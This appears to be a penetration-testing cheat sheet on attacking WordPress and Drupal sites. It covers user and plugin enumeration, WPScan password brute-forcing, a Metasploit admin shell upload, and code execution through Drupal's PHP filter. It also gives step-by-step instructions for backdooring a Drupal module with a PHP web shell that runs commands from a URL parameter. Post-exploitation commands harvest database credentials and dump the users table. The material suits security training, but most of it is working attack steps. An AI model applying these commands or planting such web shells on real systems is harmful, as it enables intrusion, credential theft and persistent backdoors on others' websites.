8.1 - Wordpress & Drupal
Wordpress
Basic Information
Uploaded files go to: http://10.10.10.10/wp-content/uploads/2018/08/a.txt
Themes files can be found in /wp-content/themes/, so if you change some php of the theme to get RCE you probably will use that path. For example: Using theme twentytwelve you can access the 404.php file in: /wp-content/themes/twentytwelve/404.php
Another useful url could be: /wp-content/themes/default/404.php
In wp-config.php you can find the root password of the database.
Default login paths to check: /wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/
Main WordPress Files
index.phplicense.txtcontains useful information such as the version WordPress installed.wp-activate.phpis used for the email activation process when setting up a new WordPress site.Login folders (may be renamed to hide it):
/wp-admin/login.php/wp-admin/wp-login.php/login.php/wp-login.php
xmlrpc.phpis a file that represents a feature of WordPress that enables data to be transmitted with HTTP acting as the transport mechanism and XML as the encoding mechanism. This type of communication has been replaced by the WordPress REST API.The
wp-contentfolder is the main directory where plugins and themes are stored.wp-content/uploads/Is the directory where any files uploaded to the platform are stored.wp-includes/This is the directory where core files are stored, such as certificates, fonts, JavaScript files, and widgets.
Post exploitation
The
wp-config.phpfile contains information required by WordPress to connect to the database such as the database name, database host, username and password, authentication keys and salts, and the database table prefix. This configuration file can also be used to activate DEBUG mode, which can useful in troubleshooting.
Users Permissions
Administrator
Editor: Publish and manages his and others posts
Author: Publish and manage his own posts
Contributor: Write and manage his posts but cannot publish them
Subscriber: Browser posts and edit their profile
Passive Enumeration
Get WordPress version
Check if you can find the files /license.txt or /readme.html
Inside the source code of the page (example from https://wordpress.org/support/article/pages/):
Grep
curl https://victim.com/ | grep 'content="WordPress'Meta name
CSS link files
JavaScript files
Get Plugins
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2Get Themes
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2Extract versions in general
curl -s -X GET https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2Active enumeration
Plugins and Themes
You probably won't be able to find all the Plugins and Themes passible. In order to discover all of them, you will need to actively Brute Force a list of Plugins and Themes (hopefully for us there are automated tools that contains this lists).
Users
ID Brute
You get valid users from a WordPress site by Brute Forcing users IDs:
curl -s -I -X GET http://blog.example.com/?author=1If the responses are 200 or 30X, that means that the id is valid. If the the response is 400, then the id is invalid.
wp-json
You can also try to get information about the users by querying:
curl http://blog.example.com/wp-json/wp/v2/usersOnly information about the users that has this feature enable will be provided.
Also note that /wp-json/wp/v2/pages could leak IP addresses.
Login username enumeration
When login in /wp-login.php the message is different is the indicated username exists or not.
WPScan
wpscan -h #List WPscan Parameters
wpscan --update #Update WPscan
#Enumerate WordPress using WPscan
wpscan --url "http://<TARGET_IP>" -e t #All Themes Installed
wpscan --url "http://<TARGET_IP>" -e vt #Vulnerable Themes Installed
wpscan --url "http://<TARGET_IP>" -e p #All Plugins Installed
wpscan --url "http://<TARGET_IP>" -e vp #Vulnerable Themes Installed
wpscan --url "http://<TARGET_IP>" -e u #WordPress Users
wpscan --url "http://<TARGET_IP>" --passwords path-to-wordlist #Brute Force WordPress Passwords
#Upload Reverse Shell to WordPress
http://<IP>/wordpress/wp-content/themes/twentyfifteen/404.php
#Upload using Metasploit
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
msf exploit(wp_admin_shell_upload) > set PASSWORD admin
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploitDrupal
Discovery
Check meta
curl https://www.drupal.org/ | grep 'content="Drupal'Node: Drupal indexes its content using nodes. A node can hold anything such as a blog post, poll, article, etc. The page URIs are usually of the form
/node/<nodeid>.
curl drupal-site.com/node/1Enumeration
Drupal supports three types of users by default:
Administrator: This user has complete control over the Drupal website.Authenticated User: These users can log in to the website and perform operations such as adding and editing articles based on their permissions.Anonymous: All website visitors are designated as anonymous. By default, these users are only allowed to read posts.
Version
Check
/CHANGELOG.txt
curl -s http://drupal-site.local/CHANGELOG.txt | grep -m2 ""
Drupal 7.57, 2018-02-21{% hint style="info" %} Newer installs of Drupal by default block access to the CHANGELOG.txt and README.txt files. {% endhint %}
Username enumeration
Register
In /user/register just try to create a username and if the name is already taken it will be notified:
Request new password
If you request a new password for an existing username:
If you request a new password for a non-existent username:
Get number of users
Accessing /user/<number> you can see the number of existing users, in this case is 2 as /users/3 returns a not found error:
Hidden pages
Fuzz /node/$ where $ is a number (from 1 to 500 for example).
You could find hidden pages (test, dev) which are not referenced by the search engines.
Installed modules info
#From https://twitter.com/intigriti/status/1439192489093644292/photo/1
#Get info on installed modules
curl https://example.com/config/sync/core.extension.yml
curl https://example.com/core/core.services.yml
# Download content from files exposed in the previous step
curl https://example.com/config/sync/swiftmailer.transport.ymlAutomatic
droopescan scan drupal -u http://drupal-site.localRCE
With PHP Filter Module
{% hint style="warning" %} In older versions of Drupal (before version 8), it was possible to log in as an admin and enable the PHP filter module, which "Allows embedded PHP code/snippets to be evaluated." {% endhint %}
You need the plugin php to be installed (check it accessing to /modules/php and if it returns a 403 then, exists, if not found, then the plugin php isn't installed)
Go to Modules -> (Check) PHP Filter -> Save configuration
Then click on Add content -> Select Basic Page or Article -> Write php shellcode on the body -> Select PHP code in Text format -> Select Preview
Finally just access the newly created node:
curl http://drupal-site.local/node/3Install PHP Filter Module
From version 8 onwards, the PHP Filter module is not installed by default. To leverage this functionality, we would have to install the module ourselves.
Download the most recent version of the module from the Drupal website.
Once downloaded go to
Administration>Reports>Available updates.Click on
Browse,select the file from the directory we downloaded it to, and then clickInstall.Once the module is installed, we can click on
Contentand create a new basic page, similar to how we did in the Drupal 7 example. Again, be sure to selectPHP codefrom theText formatdropdown.
Backdoored Module
A backdoored module can be created by adding a shell to an existing module. Modules can be found on the drupal.org website. Let's pick a module such as CAPTCHA. Scroll down and copy the link for the tar.gz archive.
Download the archive and extract its contents.
wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gzCreate a PHP web shell with the contents:
<?php
system($_GET["cmd"]);
?>Next, we need to create a
.htaccessfile to give ourselves access to the folder. This is necessary as Drupal denies direct access to the/modulesfolder.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>The configuration above will apply rules for the / folder when we request a file in /modules. Copy both of these files to the captcha folder and create an archive.
mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/Assuming we have administrative access to the website, click on
Manageand thenExtendon the sidebar. Next, click on the+ Install new modulebutton, and we will be taken to the install page, such ashttp://drupal-site.local/admin/modules/installBrowse to the backdoored Captcha archive and clickInstall.Once the installation succeeds, browse to
/modules/captcha/shell.phpto execute commands.
Post Exploitation
Read settings.php
find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/nullDump users from DB
mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from users'[CVE-2018-7600] Drupalgeddon 2
https://ine.com/blog/cve-2018-7600-drupalgeddon-2
In late March 2018, a critical vulnerability was uncovered in Drupal CMS. Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 versions were affected by this vulnerability.
It allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or standard module configurations.
A lot of PoC is available to exploit this vulnerability.
Last updated